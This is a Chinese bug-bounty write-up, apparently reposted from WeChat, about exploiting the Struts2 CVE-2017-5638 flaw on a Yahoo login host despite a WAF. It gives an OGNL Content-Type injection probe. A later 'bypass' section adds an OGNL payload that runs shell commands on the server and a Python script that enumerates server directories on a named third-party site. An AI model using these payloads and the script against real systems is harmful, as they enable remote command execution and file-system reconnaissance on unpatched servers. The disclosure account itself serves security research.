0x001 前言 正如你知道的,apache2(CVE-2017-5638)中发现了一个远程代码执行,许多Web应用程序被大量利用。 0x002 测试过程经过近3个星期的Struts2漏洞发布,在我的侦察过程中,我遇到了这个链接:https://svdevems01.direct.gq1.yahoo.com/sm/login.jsp 这是一个登录页面雅虎使用的解决方案。
试图在那里找到漏洞,但是我失败,直到我找到这个URL:https://svdevems01.direct.gq1.ya ... gecontentgrabber.do ,对于那些.action ,.do,.go这意味着运行struts2的web应用程序。
所以正如我所说的那样,这个漏洞被发布并且易于使用,但是这里有WAF阻止了我的攻击。 我不想就停止在这里,我必须提供一个有效的POC。经过一些搜索后,我发现一个有效载荷可以绕过WAF利用这个漏洞。 我发现的检测方法是使用Content-Type HTTP头发送特制数据包。标题如下所示: - Content-Type: %{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Ack-Th3g3nt3lman-POC’,4*4)}.multipart/form-data
复制代码新请求Web服务器多个两个数字,并可用于请求Web服务器执行任何其他操作。在上面的例子中,两个数字是4和4。而Web服务器的答案是16,结论是服务器容易受到攻击。 根据下图所示的响应将包含新标题 X-Ack-Th3g3nt3lman-POC: 16
这是公平的,通过hackerone报告雅虎的错误,雅虎在30分钟内对报告进行了审核,将应用程序脱机解决了这个问题,之后我确认了修复程序,在一个星期内,我获得了5500美元。
0x003 绕过方法补充
POC
Payload- ${"~["+new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','ifconfig|base64 -w 0'}).start().getInputStream())).readLine()+"]~"}
复制代码 POC
- #! /usr/bin/env python
- # -*- coding: utf-8 -*-
- import re
- import base64
- import requests
-
- path = '/usr/local/bea/'#要读取的路径
- url = "http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm"#漏洞URL
- data = """--289b3f46292c4eee95g3f64e37d6f4dc\r\nContent-Disposition: form-data; name="redirect:/${"~["+new java.io.File("%s").listFiles()[%s]+"]~"}"\r\n\r\n10498\r\n--289b3f46292c4eee95g3f64e37d6f4dc--"""
- try:
- headers = {
- 'Content-Type': 'multipart/form-data; boundary=289b3f46292c4eee95g3f64e37d6f4dc',
- 'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
- }
- for x in range(0, 400):
- response = requests.post(url, data = data % (path, str(x)), headers=headers, timeout=5, verify=False, allow_redirects=False)
- result = re.findall(r'~\[(.*?)\]~', response.content, re.S|re.I)
- if len(result) !=0:
- print(result[0])
- else:
- print("Result End.....")
- break
- except Exception, e:
- print(str(e))
复制代码
from:https://mp.weixin.qq.com/s?__biz ... Kbe8WIhxEhDDcC6v#rd |